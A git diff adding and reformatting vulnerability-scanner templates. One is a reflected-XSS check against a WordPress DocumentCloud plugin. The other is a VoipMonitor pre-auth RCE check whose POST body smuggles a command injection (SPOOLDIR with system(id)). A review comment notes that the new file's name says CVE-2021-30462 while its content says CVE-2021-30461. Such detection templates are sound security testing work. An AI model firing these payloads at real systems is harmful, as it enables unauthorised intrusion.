diff --git a/date.txt b/date.txt
index dcf1ca303e..d04e3ab904 100644
--- a/date.txt
+++ b/date.txt
@@ -1 +1 @@
-20241013
+20241014
diff --git a/poc.txt b/poc.txt
index 5937b875d6..446d1667c9 100644
--- a/poc.txt
+++ b/poc.txt
@@ -50399,6 +50399,7 @@
 ./poc/cve/cve-2021-30461-6056.yaml
 ./poc/cve/cve-2021-30461-6057.yaml
 ./poc/cve/cve-2021-30461.yaml
+./poc/cve/cve-2021-30462.yaml
 ./poc/cve/cve-2021-30497-6058.yaml
 ./poc/cve/cve-2021-30497-6059.yaml
 ./poc/cve/cve-2021-30497-6060.yaml
diff --git a/poc/cve/cve-2015-2807-2498.yaml b/poc/cve/cve-2015-2807-2498.yaml
index 629ffb8b95..b39565c245 100644
--- a/poc/cve/cve-2015-2807-2498.yaml
+++ b/poc/cve/cve-2015-2807-2498.yaml
@@ -1,4 +1,5 @@
 id: CVE-2015-2807
+
 info:
 name: Navis DocumentCloud 0.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
 author: daffainfo
@@ -8,20 +9,24 @@ info:
 - https://nvd.nist.gov/vuln/detail/CVE-2015-2807
 tags: cve,cve2015,wordpress,wp-plugin,xss
 description: "Cross-site scripting (XSS) vulnerability in js/window.php in the Navis DocumentCloud plugin before 0.1.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the wpbase parameter."
+
 requests:
 - method: GET
 path:
 - "{{BaseURL}}/wp-content/plugins/navis-documentcloud/js/window.php?wpbase=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+
 matchers-condition: and
 matchers:
 - type: word
 words:
 - ''
 part: body
+
 - type: word
 part: header
 words:
 - text/html
+
 - type: status
 status:
 - 200
diff --git a/poc/cve/cve-2021-30462.yaml b/poc/cve/cve-2021-30462.yaml
new file mode 100644
index 0000000000..3e99ae09d3
--- /dev/null
+++ b/poc/cve/cve-2021-30462.yaml
@@ -0,0 +1,38 @@
+id: CVE-2021-30461
+
+info:
+ name: VoipMonitor Pre-Auth-RCE
+ author: nithissh
+ severity: critical
+ description: A malicious actor can trigger Un authenticated Remote Code Execution using CVE-2021-30461.
+ tags: cve,cve2021,rce,voipmonitor
+ reference: https://ssd-disclosure.com/ssd-advisory-voipmonitor-unauth-rce/
+
+requests:
+ - raw:
+ - |
+ POST /index.php HTTP/1.1
+ Host: {{Hostname}}
+ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+ Accept-Language: en-US,en;q=0.5
+ Accept-Encoding: gzip, deflate
+ Connection: close
+ Content-Type: application/x-www-form-urlencoded
+ Content-Length: 35
+
+ SPOOLDIR=test".system(id)."&recheck=Recheck
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "uid="
+ - "gid="
+ - "groups="
+ - "VoIPmonitor installation"
+ part: body
+ condition: and
+
+ - type: status
+ status:
+ - 200
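Review bot: The `id`, the description and the reference in this new file all name CVE-2021-30461, while the file itself is `poc/cve/cve-2021-30462.yaml` and the poc.txt hunk indexes it directly beside the existing `./poc/cve/cve-2021-30461.yaml`, so the template is either misnamed or a duplicate of that entry under the wrong identifier; confirm which CVE it is meant to cover and align the filename, `id` and index entry before merging. Any pipeline that correlates findings by template id will attribute hits from this file to CVE-2021-30461, so the mismatch misreports detections rather than being cosmetic. The description also carries a typo; suggested wording: `description: A malicious actor can trigger unauthenticated remote code execution using CVE-2021-30461.`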